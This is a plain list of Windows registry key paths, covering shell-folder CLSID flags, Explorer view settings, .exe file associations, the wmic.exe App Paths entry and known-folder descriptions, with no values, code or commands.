HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DAF95313-E44D-46AF-BE1BCBACEA2C3065}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DAF95313-E44D-46AF-BE1BCBACEA2C3065}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DAF95313-E44D-46AF-BE1BCBACEA2C3065}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DAF95313-E44D-46AF-BE1BCBACEA2C3065}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DAF95313-E44D-46AF-BE1BCBACEA2C3065}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DAF95313-E44D-46AF-BE1BCBACEA2C3065}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DAF95313-E44D-46AF-BE1B-
CBACEA2C3065}\ShellFolder\HasNavigationEnum
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\ShellFolder
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}
HKEY_CLASSES_ROOT\CLSID\{E345F35F-9397-435C-8F95-4E922C26259E}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E345F35F-9397-435C-8F95-4E922C26259E}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E345F35F-9397-435C-8F95-4E922C26259E}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E345F35F-9397-435C-8F95-4E922C26259E}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E345F35F-9397-435C-8F95-4E922C26259E}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E345F35F-9397-435C-8F95-4E922C26259E}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E345F35F-9397-435C-8F95-4E922C26259E}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E345F35F-9397-435C-8F95-4E922C26259E}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E345F35F-9397-435C-8F954E922C26259E}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E345F35F-9397-435C-8F95-4E922C26259E}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E345F35F-9397-435C-8F95-4E922C26259E}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E345F35F-9397-435C-8F95-4E922C26259E}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E345F35F-9397-435C-8F95-4E922C26259E}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E345F35F-9397-435C-8F954E922C26259E}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E345F35F-9397-435C-8F954E922C26259E}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E345F35F-9397-435C-8F954E922C26259E}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E345F35F-9397-435C-8F95-4E922C26259E}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E345F35F-9397-435C-8F954E922C26259E}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{E345F35F-9397-435C-8F95-4E922C26259E}\ShellFolder\HasNavigationEnum
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{E345F35F-9397-435C-8F95-4E922C26259E}\ShellFolder
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{E345F35F-9397-435C-8F95-4E922C26259E}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{E345F35F-9397-435C-8F95-4E922C26259E}
HKEY_CLASSES_ROOT\CLSID\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{ED228FDF-9EA8-4870-83B196B02CFE0D52}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{ED228FDF-9EA8-4870-83B196B02CFE0D52}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{ED228FDF-9EA8-4870-83B196B02CFE0D52}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{ED228FDF-9EA8-4870-83B196B02CFE0D52}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{ED228FDF-9EA8-4870-83B196B02CFE0D52}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{ED228FDF-9EA8-4870-83B196B02CFE0D52}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{ED228FDF-9EA8-4870-83B196B02CFE0D52}\ShellFolder\HasNavigationEnum
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\ShellFolder
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}
HKEY_CLASSES_ROOT\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F02C1A0D-BE21-4350-88B07367FC96EF3C}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F02C1A0D-BE21-4350-88B07367FC96EF3C}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F02C1A0D-BE21-4350-88B07367FC96EF3C}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F02C1A0D-BE21-4350-88B07367FC96EF3C}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F02C1A0D-BE21-4350-88B0-
7367FC96EF3C}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F02C1A0D-BE21-4350-88B07367FC96EF3C}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder\HasNavigationEnum
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\wmic.exe
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\wmic.exe
HKEY_CLASSES_ROOT\Drive\shellex\FolderExtensions
HKEY_CLASSES_ROOT\Drive\shellex\FolderExtensions\{fbeb8a05-beee-4442-804e-409d6c4515e9}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Drive\shellex\FolderExtensions\{fbeb8a05-beee-4442-804e-409d6c4515e9}\DriveMask
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Explorer
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DontShowSuperHidden
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellState
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\ClassicShell
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\SeparateProcess
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoNetCrawling
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSimpleStartMenu
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowCompColor
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\DontPrettyPath
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowInfoTip
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideIcons
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\MapNetDrvBtn
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\WebView
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Filter
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SeparateProcess
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\NoNetCrawling
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\AutoCheckSelect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\IconsOnly
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowTypeOverlay
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Shell\RegisteredApplications\UrlAssociations\Directory\OpenWithProgids
HKEY_CURRENT_USER\Software\Microsoft\Windows\Shell\Associations\UrlAssociations\Directory
HKEY_CLASSES_ROOT\Directory
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\CurVer
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\ShellEx\IconHandler
HKEY_CLASSES_ROOT\Folder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\ShellEx\IconHandler
HKEY_CLASSES_ROOT\AllFilesystemObjects
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\ShellEx\IconHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\AlwaysShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Directory\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\AllowFileCLSIDJunctions
HKEY_CLASSES_ROOT\.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.exe\(Default)
HKEY_CLASSES_ROOT\.exe\OpenWithProgids
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.exe\OpenWithProgids
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.exe\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.exe\UserChoice
HKEY_CLASSES_ROOT\exefile
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\CurVer
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\ShellEx\IconHandler
HKEY_CLASSES_ROOT\SystemFileAssociations\.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\ShellEx\IconHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.exe\Content Type
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\AlwaysShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\AlwaysShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\NeverShowExt
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EFBD1DC332AEAE}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EFBD1DC332AEAE}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EFBD1DC332AEAE}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EFBD1DC332AEAE}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EFBD1DC332AEAE}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EFBD1DC332AEAE}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EFBD1DC332AEAE}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EFBD1DC332AEAE}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EFBD1DC332AEAE}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EFBD1DC332AEAE}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EFBD1DC332AEAE}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EFBD1DC332AEAE}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EFBD1DC332AEAE}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EFBD1DC332AEAE}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EFBD1DC332AEAE}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EFBD1DC332AEAE}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EFBD1DC332AEAE}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EFBD1DC332AEAE}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EFBD1DC332AEAE}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EFBD1DC332AEAE}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EFBD1DC332AEAE}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EFBD1DC332AEAE}\PropertyBag
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\KnownFolders
HKEY_CURRENT_USER
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFEEA3317B67173}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFEEA3317B67173}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFEEA3317B67173}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFEEA3317B67173}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFEEA3317B67173}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFEEA3317B67173}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFEEA3317B67173}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFEEA3317B67173}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFEEA3317B67173}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFEEA3317B67173}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFEEA3317B67173}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFEEA3317B67173}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFEEA3317B67173}\StreamResourceType
